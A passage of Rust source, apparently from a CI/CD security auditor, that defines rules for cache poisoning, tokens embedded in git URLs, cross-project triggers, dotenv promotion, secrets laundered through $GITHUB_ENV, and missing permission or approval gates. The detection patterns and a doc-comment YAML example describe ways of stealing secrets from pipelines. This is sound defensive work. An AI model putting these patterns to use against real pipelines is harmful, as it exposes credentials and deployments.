return Some("absent (defaults to a single shared 'default' key per runner)");
}
// CI_JOB_NAME alone — same name across MR + main = shared key.
if trimmed == "$CI_JOB_NAME"
|| trimmed == "${CI_JOB_NAME}"
|| trimmed.eq_ignore_ascii_case("$ci_job_name")
{
return Some(
"`$CI_JOB_NAME` only — same name on MR and default-branch jobs share the cache",
);
}
// CI_COMMIT_REF_SLUG alone — handled by caller (depends on policy).
// Otherwise: any key without a $-interpolation is hardcoded → shared.
if !trimmed.contains('$') {
return Some("hardcoded — every job and every branch share the same cache");
}
None
}
/// Rule: `cache_key_crosses_trust_boundary` (Medium, Supply Chain).
///
/// A GitLab `cache:` declaration whose `key:` is hardcoded, `$CI_JOB_NAME`
/// only, or `$CI_COMMIT_REF_SLUG` *without* a `policy: pull` restriction.
/// Caches are stored per-runner keyed by `key:` — a poisoned MR can push a
/// malicious `node_modules/` cache that the next default-branch job
/// downloads and executes.
pub fn cache_key_crosses_trust_boundary(graph: &AuthorityGraph) -> Vec<Finding> {
let mut findings = Vec::new();
for step in graph.nodes_of_kind(NodeKind::Step) {
let key = match step.metadata.get(META_GITLAB_CACHE_KEY) {
Some(k) => k,
None => continue,
};
let policy = step
.metadata
.get(META_GITLAB_CACHE_POLICY)
.map(|s| s.as_str())
.unwrap_or("pull-push"); // GitLab's runtime default
// pull-only consumers cannot poison the cache — skip those
let is_pull_only = matches!(policy, "pull");
let trimmed = key.trim();
// Per-ref key: $CI_COMMIT_REF_SLUG. Safe ONLY when the consuming jobs
// restrict themselves to `policy: pull`. Without that restriction, an
// MR job pushes a cache the next protected-branch job downloads
// (refs are *namespaced* but not *isolated* — the same key on `main`
// shadows over time and the runner's per-key store is shared).
let is_ref_slug = trimmed == "$CI_COMMIT_REF_SLUG"
|| trimmed == "${CI_COMMIT_REF_SLUG}"
|| trimmed.eq_ignore_ascii_case("$ci_commit_ref_slug");
if is_ref_slug {
if !is_pull_only {
findings.push(Finding {
severity: Severity::Medium,
category: FindingCategory::CacheKeyCrossesTrustBoundary,
path: None,
nodes_involved: vec![step.id],
message: format!(
"Step '{}' uses cache key `$CI_COMMIT_REF_SLUG` with policy `{policy}` — MR jobs can push poisoned caches that subsequent default-branch jobs restore (npm install / Maven plugin resolution executes cached artifacts)",
step.name
),
recommendation: Recommendation::Manual {
action: "Set `policy: pull` on jobs that consume the cache from a different trust context (default-branch, protected refs), and restrict `policy: push` to a dedicated job that runs only on protected branches. Combine with `key: { files: [package-lock.json] }` so cache reuse requires identical input hashes.".into(),
},
source: FindingSource::BuiltIn,
extras: FindingExtras::default(),
});
}
continue;
}
if let Some(reason) = unsafe_cache_key(key) {
findings.push(Finding {
severity: Severity::Medium,
category: FindingCategory::CacheKeyCrossesTrustBoundary,
path: None,
nodes_involved: vec![step.id],
message: format!(
"Step '{}' has cache key `{key}` ({reason}) with policy `{policy}` — caches cross trust boundaries; an MR or fork can stage a poisoned cache that the next protected-branch job restores and executes",
step.name
),
recommendation: Recommendation::Manual {
action: "Scope the cache key to inputs only an authorized run can produce, e.g. `key: { files: [package-lock.json] }` so the key changes when dependencies change, and combine with `policy: pull` on consumers in higher trust contexts.".into(),
},
source: FindingSource::BuiltIn,
extras: FindingExtras::default(),
});
}
}
findings
}
/// Local view-struct mirroring `taudit_parse_gitlab::IncludeEntry` — kept here
/// so taudit-core does not depend on taudit-parse-gitlab. The two crates pass
/// data only through the JSON blob in `META_GITLAB_INCLUDES`.
mod taudit_parse_gitlab_include_view {
use serde::Deserialize;
#[derive(Debug, Clone, Deserialize)]
pub struct IncludeView {
pub kind: String,
pub target: String,
pub git_ref: String,
}
}
/// Rule: a CI script body constructs an HTTPS git URL with credentials
/// embedded directly in the URL (`https://user:$TOKEN@host/...`) and
/// invokes git against it (`git clone`, `git push`, `git remote set-url`,
/// `git fetch`, `git ls-remote`).
///
/// Detection: scan `META_SCRIPT_BODY` for the regex equivalent
/// `https://[^/\s'"]*:\$\{?[A-Z0-9_]*(TOKEN|PAT|PASSWORD|PASSWD|KEY|SECRET)[A-Z0-9_]*\}?@`
/// implemented byte-by-byte to keep the dependency surface minimal.
///
/// Severity: **High**. Embedded credentials persist in `.git/config`,
/// are visible to every subsequent process via `ps`/`/proc/*/cmdline`,
/// land in `GIT_TRACE` output when set, and may be uploaded as part of
/// any artifact that bundles the workspace.
pub fn pat_embedded_in_git_remote_url(graph: &AuthorityGraph) -> Vec<Finding> {
let mut findings = Vec::new();
for step in graph.nodes_of_kind(NodeKind::Step) {
let body = match step.metadata.get(META_SCRIPT_BODY) {
Some(b) if !b.trim().is_empty() => b,
_ => continue,
};
let hits = find_credential_embedded_git_urls(body);
if hits.is_empty() {
continue;
}
// Cap message previews so we don't spam logs with huge URLs.
let preview: String = hits
.iter()
.take(2)
.map(|s| s.as_str())
.collect::<Vec<_>>()
.join(", ");
let suffix = if hits.len() > 2 {
format!(", and {} more", hits.len() - 2)
} else {
String::new()
};
findings.push(Finding {
severity: Severity::High,
category: FindingCategory::PatEmbeddedInGitRemoteUrl,
path: None,
nodes_involved: vec![step.id],
message: format!(
"Step '{}' embeds a credential variable directly in a git remote URL ({}{}). The token value is exposed in process argv (visible to `ps`), persists in .git/config for the rest of the job, and is captured by GIT_TRACE if enabled.",
step.name, preview, suffix
),
recommendation: Recommendation::Manual {
action: "Use a credential helper or env-var-based authentication instead of inlining the token in the URL. For GitLab CI, prefer `git -c http.extraHeader=\"PRIVATE-TOKEN: $PAT_TOKEN\" push <url>`, or set `CI_JOB_TOKEN` as the credential helper. Never construct `https://user:$TOKEN@host/...` URLs.".into(),
},
source: FindingSource::BuiltIn,
extras: FindingExtras::default(),
});
}
findings
}
/// Find substrings in `body` that look like
/// `https://<userpart>:<token-var-ref>@host`. Returns up to 8 unique hits
/// (stable order). The token variable is required to look like a credential
/// name (TOKEN/PAT/PASSWORD/PASSWD/KEY/SECRET) — bare `$VAR` references
/// without a credential-shaped name don't fire to keep the false-positive
/// rate down.
fn find_credential_embedded_git_urls(body: &str) -> Vec<String> {
let mut hits: Vec<String> = Vec::new();
let bytes = body.as_bytes();
let mut i = 0usize;
let needle = b"https://";
while i + needle.len() <= bytes.len() {
if &bytes[i..i + needle.len()] != needle {
i += 1;
continue;
}
// Find the end of the URL "authority" component — terminator is the
// next `/`, whitespace, quote, or end-of-string.
let mut end = i + needle.len();
while end < bytes.len() {
let c = bytes[end];
if c == b'/'
|| c == b' '
|| c == b'\t'
|| c == b'\n'
|| c == b'\r'
|| c == b'"'
|| c == b'\''
|| c == b'`'
{
break;
}
end += 1;
}
let authority = &body[i + needle.len()..end];
if url_authority_has_embedded_credential_var(authority) {
// Capture the full URL up to the path delimiter for the message.
let urlend = end;
let url = &body[i..urlend];
let url_short = if url.len() > 120 {
format!("{}…", &url[..120])
} else {
url.to_string()
};
if !hits.contains(&url_short) {
hits.push(url_short);
if hits.len() == 8 {
break;
}
}
}
i = end.max(i + 1);
}
hits
}
/// Decide whether a URL's authority component (everything after `https://`
/// and before the path) contains a credential-shaped variable reference of
/// the form `user:$TOKEN_NAME@host` or `user:${TOKEN_NAME}@host`.
fn url_authority_has_embedded_credential_var(authority: &str) -> bool {
// Must contain both ':' and '@' with ':' before '@'.
let at = match authority.find('@') {
Some(p) => p,
None => return false,
};
let userinfo = &authority[..at];
let colon = match userinfo.find(':') {
Some(p) => p,
None => return false,
};
let pw_part = &userinfo[colon + 1..];
if pw_part.is_empty() {
return false;
}
// Strip optional `${...}` braces so we can inspect the variable name.
let pw_inner = pw_part.trim_start_matches('$');
let pw_inner = pw_inner.trim_start_matches('{').trim_end_matches('}');
// Variable name must look like an env var (uppercase, digits, underscores)
// and contain a credential-shaped fragment.
if pw_inner.is_empty() {
return false;
}
let looks_like_var = pw_inner
.chars()
.all(|c| c.is_ascii_uppercase() || c.is_ascii_digit() || c == '_');
if !looks_like_var {
return false;
}
const CRED_FRAGMENTS: &[&str] = &[
"TOKEN", "PAT", "PASSWORD", "PASSWD", "KEY", "SECRET", "CRED",
];
CRED_FRAGMENTS.iter().any(|frag| pw_inner.contains(frag))
}
/// Rule: a CI script triggers a different project's pipeline via the GitLab
/// REST API using `CI_JOB_TOKEN` and forwards variables via the
/// `variables[KEY]=value` query/form parameter. Cross-project authority
/// bridge — the downstream project's security depends on the trust contract
/// between the two projects, and variable values flowing across that
/// boundary may originate from MR/fork context the attacker controls.
///
/// Severity: **Medium**. Higher-risk when the triggering job runs on MR
/// pipelines (`META_TRIGGER == "merge_request"`) — the message annotates
/// that case explicitly so operators see the elevated risk.
pub fn ci_token_triggers_downstream_with_variable_passthrough(
graph: &AuthorityGraph,
) -> Vec<Finding> {
let mut findings = Vec::new();
let pipeline_is_mr_triggered = graph
.metadata
.get(META_TRIGGER)
.map(|t| t == "merge_request")
.unwrap_or(false);
for step in graph.nodes_of_kind(NodeKind::Step) {
let body = match step.metadata.get(META_SCRIPT_BODY) {
Some(b) if !b.trim().is_empty() => b,
_ => continue,
};
if !script_triggers_downstream_with_passthrough(body) {
continue;
}
let suffix = if pipeline_is_mr_triggered {
" (pipeline triggered on merge_request — variable values may originate from attacker-controlled MR context)"
} else {
""
};
findings.push(Finding {
severity: Severity::Medium,
category: FindingCategory::CiTokenTriggersDownstreamWithVariablePassthrough,
path: None,
nodes_involved: vec![step.id],
message: format!(
"Step '{}' triggers a downstream pipeline via the GitLab REST API using CI_JOB_TOKEN and forwards variables[…] in the request — this is a cross-project authority channel that bypasses the parent-child trust model{}",
step.name, suffix
),
recommendation: Recommendation::Manual {
action: "Constrain which variables the downstream pipeline accepts (use `variables.X.expand: false` and explicit allowlists), prefer pipeline triggers via `trigger:` keyword with `strategy: depend` over `curl … CI_JOB_TOKEN …`, and audit the receiving project's CI/CD settings to ensure it does not honour caller-supplied variables on protected refs.".into(),
},
source: FindingSource::BuiltIn,
extras: FindingExtras::default(),
});
}
findings
}
/// Returns true if `body` contains a `curl` (or wget) call that hits a
/// GitLab `/trigger/pipeline` endpoint with both `CI_JOB_TOKEN` and a
/// `variables[…]` field. We accept either query-string form
/// (`variables[X]=...`) or form-data form (`-F "variables[X]=..."`).
fn script_triggers_downstream_with_passthrough(body: &str) -> bool {
let lower = body.to_lowercase();
// Match a triggering call: must mention `trigger/pipeline` and reference
// CI_JOB_TOKEN, plus carry a `variables[` token.
let trigger_endpoint = lower.contains("trigger/pipeline")
|| lower.contains("/api/v4/projects/") && lower.contains("/trigger");
if !trigger_endpoint {
return false;
}
let has_token = lower.contains("ci_job_token");
if !has_token {
return false;
}
body.contains("variables[")
}
/// Rule: a job emits an `artifacts.reports.dotenv: <file>` artifact whose
/// contents become pipeline variables for any consumer linked via `needs:`
/// or `dependencies:`. A consumer in a later stage that targets a
/// production-named environment inherits those variables transparently.
/// Producer-side risk amplifies when the script reads attacker-influenced
/// inputs (`CI_COMMIT_REF_NAME`, `CI_MERGE_REQUEST_SOURCE_BRANCH_NAME`,
/// `CI_COMMIT_TAG`, branch/commit derived strings).
///
/// Severity: **High** when a producer→consumer chain exists with a
/// production-like environment on the consumer; **Medium** when the chain
/// exists but no production environment is detected (still a covert
/// variable-promotion channel).
pub fn dotenv_artifact_flows_to_privileged_deployment(graph: &AuthorityGraph) -> Vec<Finding> {
let mut findings = Vec::new();
// Build (producer name -> producer step id, dotenv file) index.
let mut producers: std::collections::HashMap<String, (NodeId, String)> =
std::collections::HashMap::new();
for step in graph.nodes_of_kind(NodeKind::Step) {
if let Some(file) = step.metadata.get(META_DOTENV_FILE) {
if let Some(job) = step.metadata.get(META_JOB_NAME) {
producers.insert(job.clone(), (step.id, file.clone()));
}
}
}
if producers.is_empty() {
return findings;
}
for consumer in graph.nodes_of_kind(NodeKind::Step) {
let needs_csv = match consumer.metadata.get(META_NEEDS) {
Some(s) if !s.is_empty() => s,
_ => continue,
};
let upstream_jobs: Vec<&str> = needs_csv.split(',').filter(|s| !s.is_empty()).collect();
let matched: Vec<&(NodeId, String)> = upstream_jobs
.iter()
.filter_map(|j| producers.get(*j))
.collect();
if matched.is_empty() {
continue;
}
let env_name = consumer
.metadata
.get(META_ENVIRONMENT_NAME)
.map(String::as_str)
.unwrap_or("");
// Production-like signal: explicit `environment.name:` value, OR
// (fallback) the job name itself encodes a production marker.
// GitLab pipelines often skip the explicit `environment:` block
// and rely on stage/job naming conventions like `deploy-prod`.
let consumer_job = consumer
.metadata
.get(META_JOB_NAME)
.map(String::as_str)
.unwrap_or(consumer.name.as_str());
let production_like =
is_production_environment(env_name) || is_production_environment(consumer_job);
// Decide elevation: production-like consumer environment OR
// producer script ingests attacker-influenced CI variables.
let producer_uses_untrusted_input = matched.iter().any(|(pid, _)| {
graph
.node(*pid)
.and_then(|n| n.metadata.get(META_SCRIPT_BODY))
.map(|b| script_uses_attacker_influenced_ci_var(b))
.unwrap_or(false)
});
if !production_like && !producer_uses_untrusted_input {
continue; // benign dotenv flow — skip
}
let severity = if production_like {
Severity::High
} else {
Severity::Medium
};
let producer_names: Vec<String> = upstream_jobs
.iter()
.filter(|j| producers.contains_key(**j))
.map(|s| (*s).to_string())
.collect();
let env_suffix = if production_like {
if env_name.is_empty() {
format!(" targeting production-like job name '{consumer_job}'")
} else {
format!(" targeting production-like environment '{env_name}'")
}
} else {
String::new()
};
let trust_suffix = if producer_uses_untrusted_input {
" (producer script reads attacker-influenced CI variables — branch/MR-source names propagate into the dotenv values)"
} else {
""
};
let mut nodes_involved = vec![consumer.id];
nodes_involved.extend(matched.iter().map(|(id, _)| *id));
findings.push(Finding {
severity,
category: FindingCategory::DotenvArtifactFlowsToPrivilegedDeployment,
path: None,
nodes_involved,
message: format!(
"Step '{}' consumes a dotenv artifact from upstream job(s) [{}]{}{} — variables defined in the upstream's `artifacts.reports.dotenv` are silently promoted to the pipeline variable namespace, indistinguishable from pipeline-level variables in subsequent jobs",
consumer.name,
producer_names.join(", "),
env_suffix,
trust_suffix
),
recommendation: Recommendation::Manual {
action: "Treat dotenv outputs as untrusted: pin the producer to a protected branch/tag context only, validate variable values in the consumer before use, and prefer explicit `needs:[…].artifacts: false` plus pipeline-scoped variables for deployment selection. Never let dotenv-promoted values choose service connections, deploy targets, or registry destinations without an allowlist check.".into(),
},
source: FindingSource::BuiltIn,
extras: FindingExtras::default(),
});
}
findings
}
/// True when an environment name matches common production-like patterns.
fn is_production_environment(name: &str) -> bool {
if name.is_empty() {
return false;
}
let lower = name.to_lowercase();
const TOKENS: &[&str] = &["prod", "production", "prd", "live"];
for token in TOKENS {
// Match either as a whole word or a `/`-separated segment, e.g.
// `production/eu-west-1`, `prod-cluster`.
if lower == *token {
return true;
}
if lower.starts_with(&format!("{token}-"))
|| lower.starts_with(&format!("{token}/"))
|| lower.contains(&format!("/{token}/"))
|| lower.contains(&format!("-{token}-"))
|| lower.ends_with(&format!("/{token}"))
|| lower.ends_with(&format!("-{token}"))
{
return true;
}
}
false
}
/// True when an inline script reads CI variables that carry attacker-controllable
/// content (branch names, MR source/target refs, tag refs, commit messages).
fn script_uses_attacker_influenced_ci_var(script: &str) -> bool {
const NEEDLES: &[&str] = &[
"CI_COMMIT_REF_NAME",
"CI_COMMIT_BRANCH",
"CI_COMMIT_TAG",
"CI_COMMIT_MESSAGE",
"CI_COMMIT_TITLE",
"CI_COMMIT_DESCRIPTION",
"CI_MERGE_REQUEST_SOURCE_BRANCH_NAME",
"CI_MERGE_REQUEST_TITLE",
"CI_MERGE_REQUEST_DESCRIPTION",
];
NEEDLES.iter().any(|n| script.contains(n))
}
/// Rule: secret laundered through `$GITHUB_ENV` reaches an untrusted consumer
/// in the same job — composition gap between `self_mutating_pipeline` (the
/// gate-write detector) and `untrusted_with_authority` (the direct-access
/// detector).
///
/// **Pattern (R2 attack #3):**
/// ```yaml
/// jobs:
/// build:
/// steps:
/// - name: setup
/// run: echo "CLOUD_KEY=${{ secrets.CLOUD_KEY }}" >> $GITHUB_ENV # writer
/// - uses: some-org/deploy@main # untrusted
/// with:
/// key: ${{ env.CLOUD_KEY }} # consumer
/// ```
/// The writer trips `self_mutating_pipeline`. The consumer never gets a
/// `HasAccessTo` edge to `CLOUD_KEY` (the value is sourced from the runner
/// env, not the secrets store) so neither `untrusted_with_authority` nor
/// `authority_propagation` fire — the env-gate launders the trust zone.
///
/// **Detection:** for every Step in the same job:
/// - Writer: `META_WRITES_ENV_GATE = "true"` AND has `HasAccessTo` to a
/// Secret/Identity (the value being laundered must derive from authority)
/// - Consumer: appears later in the job (NodeId order tracks declaration
/// order), trust zone is `Untrusted` or `ThirdParty`, and carries
/// `META_READS_ENV = "true"` (stamped by the parser when the step
/// references `${{ env.X }}` in `with:` / `run:`)
///
/// Same-job constraint enforced via `META_JOB_NAME` — the env gate only
/// propagates within a job, so cross-job pairs are not flagged.
pub fn secret_via_env_gate_to_untrusted_consumer(graph: &AuthorityGraph) -> Vec<Finding> {
let mut findings = Vec::new();
// Step 1: enumerate writer-with-secret nodes, paired with the laundered
// authority names so the finding message can name them. We capture the
// node id in declaration order so the same-job ordering check below is a
// simple comparison rather than an O(n²) scan.
struct Writer<'a> {
id: NodeId,
job: &'a str,
name: &'a str,
secrets: Vec<&'a str>,
}
let writers: Vec<Writer<'_>> = graph
.nodes_of_kind(NodeKind::Step)
.filter(|step| {
step.metadata
.get(META_WRITES_ENV_GATE)
.map(|v| v == "true")
.unwrap_or(false)
})
.filter_map(|step| {
let job = step.metadata.get(META_JOB_NAME)?.as_str();
// Must hold authority — collect Secret/Identity names reachable
// via HasAccessTo. An env-gate write that doesn't carry any
// authority is the harmless "ECHO ROUTE=/api >> $GITHUB_ENV"
// case; not in scope for this rule.
let secrets: Vec<&str> = graph
.edges_from(step.id)
.filter(|e| e.kind == EdgeKind::HasAccessTo)
.filter_map(|e| graph.node(e.to))
.filter(|n| matches!(n.kind, NodeKind::Secret | NodeKind::Identity))
.map(|n| n.name.as_str())
.collect();
if secrets.is_empty() {
return None;
}
Some(Writer {
id: step.id,
job,
name: step.name.as_str(),
secrets,
})
})
.collect();
if writers.is_empty() {
return findings;
}
// Step 2: for every consumer step that reads env, find the writer(s) it
// could be laundering from.
for consumer in graph.nodes_of_kind(NodeKind::Step) {
// Consumer must read the runner env.
let reads_env = consumer
.metadata
.get(META_READS_ENV)
.map(|v| v == "true")
.unwrap_or(false);
if !reads_env {
continue;
}
// Consumer must run with reduced trust — first-party readers are
// already accounted for elsewhere and would be a high-FP class.
if !matches!(
consumer.trust_zone,
TrustZone::Untrusted | TrustZone::ThirdParty
) {
continue;
}
let consumer_job = match consumer.metadata.get(META_JOB_NAME) {
Some(j) => j.as_str(),
None => continue,
};
// Find writers in the same job that appear earlier (NodeId order
// mirrors declaration order — see GHA parser, ADO parser).
let upstream: Vec<&Writer<'_>> = writers
.iter()
.filter(|w| w.job == consumer_job && w.id < consumer.id)
.collect();
if upstream.is_empty() {
continue;
}
// Aggregate the laundered authority names across all writers so
// operators see the full set of credentials potentially reaching
// the untrusted step. Stable ordering, dedup'd.
let mut secret_labels: Vec<&str> = upstream
.iter()
.flat_map(|w| w.secrets.iter().copied())
.collect();
secret_labels.sort_unstable();
secret_labels.dedup();
let writer_names: Vec<&str> = upstream.iter().map(|w| w.name).collect();
let mut nodes_involved = vec![consumer.id];
nodes_involved.extend(upstream.iter().map(|w| w.id));
// Include the laundered Secret/Identity nodes themselves so the
// fingerprint and downstream consumers can attribute the finding
// to a specific credential.
for w in &upstream {
for e in graph.edges_from(w.id) {
if e.kind == EdgeKind::HasAccessTo
&& graph
.node(e.to)
.map(|n| matches!(n.kind, NodeKind::Secret | NodeKind::Identity))
.unwrap_or(false)
&& !nodes_involved.contains(&e.to)
{
nodes_involved.push(e.to);
}
}
}
findings.push(Finding {
severity: Severity::Critical,
category: FindingCategory::SecretViaEnvGateToUntrustedConsumer,
path: None,
nodes_involved,
message: format!(
"Untrusted consumer '{}' in job '{}' reads from $GITHUB_ENV after step(s) [{}] laundered authority [{}] through the env gate — secret reaches untrusted code without ever appearing in a HasAccessTo edge",
consumer.name,
consumer_job,
writer_names.join(", "),
secret_labels.join(", "),
),
recommendation: Recommendation::Manual {
action: "Pass the secret to the consuming step via an explicit `env:` mapping on that step (so the relationship is graph-visible) instead of writing it to `$GITHUB_ENV` for ambient pickup. If the consumer is a third-party action, pin it to a 40-char SHA before exposing any secret-derived value to it.".into(),
},
source: FindingSource::BuiltIn,
extras: FindingExtras::default(),
});
}
findings
}
// ── Positive invariants (negative-space rules) ───────────────────
//
// These rules fire on the ABSENCE of an expected defensive control rather
// than on the presence of a misconfigured one. They are derived from the
// blue-team corpus defense report — patterns observed across thousands of
// pipelines where the well-defended workflows had a control the others were
// missing.
//
// Each function gates strictly on `META_PLATFORM` so a single pipeline file
// is only evaluated by the rules that apply to its source platform.
/// Returns true when a graph belongs to the named platform. Falls back to
/// false (rule no-ops) when no platform stamp is present — keeps existing
/// hand-built test graphs from accidentally tripping platform-scoped rules.
fn graph_is_platform(graph: &AuthorityGraph, platform: &str) -> bool {
graph
.metadata
.get(META_PLATFORM)
.map(|p| p == platform)
.unwrap_or(false)
}
/// Rule: GHA workflow declares no top-level `permissions:` block AND no
/// per-job permissions block. With nothing declared, `GITHUB_TOKEN` falls
/// back to the broad platform default (`contents: write`, `packages: write`,
/// metadata read, etc.) on every trigger. Explicit declarations make the
/// blast radius legible to the next reviewer; absence makes it invisible.
///
/// Detection:
/// * `META_PLATFORM == "github-actions"` (gates ADO/GitLab out)
/// * Graph carries `META_NO_WORKFLOW_PERMISSIONS == "true"` (parser-set
/// when `workflow.permissions` is absent)
/// * No Identity node whose name starts with `GITHUB_TOKEN (` (those are
/// the per-job override identities the parser creates when a job
/// declares its own permissions block)
///
/// Severity: Medium. Not a direct exploit path on its own but compounds
/// every other finding in the same workflow.
pub fn no_workflow_level_permissions_block(graph: &AuthorityGraph) -> Vec<Finding> {
if !graph_is_platform(graph, "github-actions") {
return Vec::new();
}
let no_workflow_perms = graph
.metadata
.get(META_NO_WORKFLOW_PERMISSIONS)
.map(|v| v == "true")
.unwrap_or(false);
if !no_workflow_perms {
return Vec::new();
}
// Empty graphs (variable-only YAML files mis-detected as GHA, parse
// failures that left the graph empty, etc.) carry no real authority
// surface to be over-broad over. Skip them. A real workflow always
// produces at least one Step node.
if graph.nodes_of_kind(NodeKind::Step).next().is_none() {
return Vec::new();
}
// Per-job permissions blocks create Identity nodes named
// `GITHUB_TOKEN (<job_name>)`. If any exists, the workflow has at least
// one job-scoped permissions block — don't fire.
let has_job_level_perms = graph.nodes_of_kind(NodeKind::Identity).any(|n| {
n.name.starts_with("GITHUB_TOKEN (")
|| (n.name == "GITHUB_TOKEN" && n.metadata.contains_key(META_PERMISSIONS))
});
if has_job_level_perms {
return Vec::new();
}
vec![Finding {
severity: Severity::Medium,
category: FindingCategory::NoWorkflowLevelPermissionsBlock,
path: None,
nodes_involved: Vec::new(),
message: "Workflow declares no top-level or per-job `permissions:` block — GITHUB_TOKEN \
falls back to the broad platform default (contents: write, packages: write, …) \
on every trigger. Explicit permissions make the blast radius legible to triage."
.into(),
recommendation: Recommendation::ReducePermissions {
current: "platform default (broad)".into(),
minimum: "permissions: {} at top level, then add the minimum per-job — e.g. \
`permissions: { contents: read }`"
.into(),
},
source: FindingSource::BuiltIn,
extras: FindingExtras::default(),
}]
}
/// Rule: ADO job referencing a production-named service connection has no
/// `environment:` binding. Strictly broader than
/// `terraform_auto_approve_in_prod` — fires on any prod-SC step (Terraform,
/// ARM, AzureCLI, AzurePowerShell, custom) whose enclosing job lacks the
/// approval gate, regardless of whether `-auto-approve` is set.
///
/// Detection (per Step):
/// * `META_PLATFORM == "azure-devops"`
/// * Step carries `META_SERVICE_CONNECTION_NAME` matching prod pattern,
/// OR an `Identity` connected via `HasAccessTo` whose name matches
/// the same pattern AND carries `META_SERVICE_CONNECTION == "true"`.
/// * Step does NOT carry `META_ENV_APPROVAL` (parser tags every step
/// inside an environment-bound deployment job).
///
/// One finding per matching step (matching `terraform_auto_approve_in_prod`
/// granularity). Severity: High.
pub fn prod_deploy_job_no_environment_gate(graph: &AuthorityGraph) -> Vec<Finding> {
if !graph_is_platform(graph, "azure-devops") {
return Vec::new();
}
let mut findings = Vec::new();
for step in graph.nodes_of_kind(NodeKind::Step) {
let env_gated = step
.metadata
.get(META_ENV_APPROVAL)
.map(|v| v == "true")
.unwrap_or(false);
if env_gated {
continue;
}
let direct = step.metadata.get(META_SERVICE_CONNECTION_NAME).cloned();
let edge_conn = graph
.edges_from(step.id)
.filter(|e| e.kind == EdgeKind::HasAccessTo)
.filter_map(|e| graph.node(e.to))
.find(|n| {
n.kind == NodeKind::Identity
&& n.metadata
.get(META_SERVICE_CONNECTION)
.map(|v| v == "true")
.unwrap_or(false)
})
.map(|n| n.name.clone());
let conn_name = match direct.or(edge_conn) {
Some(n) if looks_like_prod_connection(&n) => n,
_ => continue,
};
findings.push(Finding {
severity: Severity::High,
category: FindingCategory::ProdDeployJobNoEnvironmentGate,
path: None,
nodes_involved: vec![step.id],
message: format!(
"Step '{}' targets production service connection '{}' but its job has no \
`environment:` binding — every pipeline trigger applies changes with no \
approval queue and no entry in the ADO Environments audit trail",
step.name, conn_name
),
recommendation: Recommendation::Manual {
action: "Move the step into a deployment job whose `environment:` is configured \
with required approvers in ADO. Even if `-auto-approve` is acceptable \
(e.g. `terraform apply tfplan`), the environment binding gives the \
platform a chokepoint for approvals, audit, and concurrency limits."
.into(),
},
source: FindingSource::BuiltIn,
extras: FindingExtras::default(),
});
}
findings
}
/// Rule: long-lived static credential in scope but the graph has no OIDC
/// identity. Advisory uplift on top of `long_lived_credential` that wires
/// the existing `Recommendation::FederateIdentity` variant — emits one Info
/// finding per static credential whose name suggests a cloud provider that
/// supports OIDC (AWS / GCP / Azure).
///
/// Heuristic: AWS / GCP / Azure tokens usually carry the provider name in
/// the variable identifier (`AWS_*`, `GCP_*`, `GCLOUD_*`, `GOOGLE_*`,
/// `AZURE_*`, `ARM_*`). When such a name appears AND no OIDC identity
/// exists in the graph, the migration to federation is the actionable
/// remediation. The recommendation enum has carried `FederateIdentity` for
/// two releases without any rule emitting it.
///
/// Severity: Info (advisory). The underlying credential is already flagged
/// at higher severity by `long_lived_credential`.
pub fn long_lived_secret_without_oidc_recommendation(graph: &AuthorityGraph) -> Vec<Finding> {
// Skip if any OIDC identity already exists — the workflow is already on
// a federated path; the static credential it carries is presumably a
// legacy artifact unrelated to the OIDC integration.
let has_oidc = graph.nodes_of_kind(NodeKind::Identity).any(|n| {
n.metadata
.get(META_OIDC)
.map(|v| v == "true")
.unwrap_or(false)
});
if has_oidc {
return Vec::new();
}
let mut findings = Vec::new();
for secret in graph.nodes_of_kind(NodeKind::Secret) {
let upper = secret.name.to_uppercase();
let provider: Option<(&str, &str)> = if upper.starts_with("AWS_")
|| upper.contains("AWS_ACCESS_KEY")
|| upper.contains("AWS_SECRET")
{
Some(("AWS", "GitHub Actions OIDC + sts:AssumeRoleWithWebIdentity (id-token: write + aws-actions/configure-aws-credentials)"))
} else if upper.starts_with("GCP_")
|| upper.starts_with("GCLOUD_")
|| upper.starts_with("GOOGLE_")
|| upper.contains("GCP_SERVICE_ACCOUNT")
|| upper.contains("GOOGLE_CREDENTIALS")
{
Some(("GCP", "GCP Workload Identity Federation (google-github-actions/auth with workload_identity_provider)"))
} else if upper.starts_with("AZURE_")
|| upper.starts_with("ARM_")
|| upper.contains("AZURE_CLIENT_SECRET")
{
Some((
"Azure",
"Azure federated credential (azure/login with client-id, no client-secret)",
))
} else {
None
};
let Some((cloud, oidc_provider)) = provider else {
continue;
};
findings.push(Finding {
severity: Severity::Info,
category: FindingCategory::LongLivedSecretWithoutOidcRecommendation,
path: None,
nodes_involved: vec![secret.id],
message: format!(
"Long-lived {cloud} credential '{}' is in scope and no OIDC identity exists \
in this workflow — {cloud} supports OIDC federation, so this credential could \
be replaced with a short-lived token issued at runtime",
secret.name
),
recommendation: Recommendation::FederateIdentity {
static_secret: secret.name.clone(),
oidc_provider: oidc_provider.into(),
},
source: FindingSource::BuiltIn,
extras: FindingExtras::default(),
});
}
findings
}
/// Rule: GHA workflow with multiple privileged jobs where SOME steps carry
/// the standard fork-check `if:` and OTHERS do not — intra-file
/// inconsistency in defensive posture. The org has the right instinct
/// (some jobs are guarded) but applied it unevenly. Surfaces the unguarded
/// privileged jobs by name so a reviewer can fix the gap in one PR.
///
/// Detection:
/// * `META_PLATFORM == "github-actions"`
/// * Trigger contains `pull_request` or `pull_request_target`
/// * Multiple jobs hold authority (steps with `HasAccessTo` to a Secret
/// or Identity)
/// * At least one such job's privileged steps ALL carry
/// `META_FORK_CHECK == "true"`
/// * AND at least one OTHER privileged job has NO step carrying that
/// marker
///
/// Severity: High. Severity floors at Medium when the inconsistency is
/// limited to a single unguarded job (one-off oversight) vs. multiple
/// (systemic gap).
pub fn pull_request_workflow_inconsistent_fork_check(graph: &AuthorityGraph) -> Vec<Finding> {
if !graph_is_platform(graph, "github-actions") {
return Vec::new();
}
let trigger = match graph.metadata.get(META_TRIGGER) {
Some(t) => t.as_str(),
None => return Vec::new(),
};
let in_pr_context = trigger.split(',').any(|t| {
let t = t.trim();
matches!(t, "pull_request" | "pull_request_target")
});
if !in_pr_context {
return Vec::new();
}
// For each privileged step, record (job_name, has_fork_check). A job is
// "guarded" iff every privileged step in it carries the marker.
use std::collections::BTreeMap;
let mut per_job: BTreeMap<String, (bool, bool)> = BTreeMap::new(); // job -> (any_guarded, any_unguarded)
for step in graph.nodes_of_kind(NodeKind::Step) {
let holds_authority = graph.edges_from(step.id).any(|e| {
e.kind == EdgeKind::HasAccessTo
&& graph
.node(e.to)
.map(|n| matches!(n.kind, NodeKind::Secret | NodeKind::Identity))
.unwrap_or(false)
});
if !holds_authority {
continue;
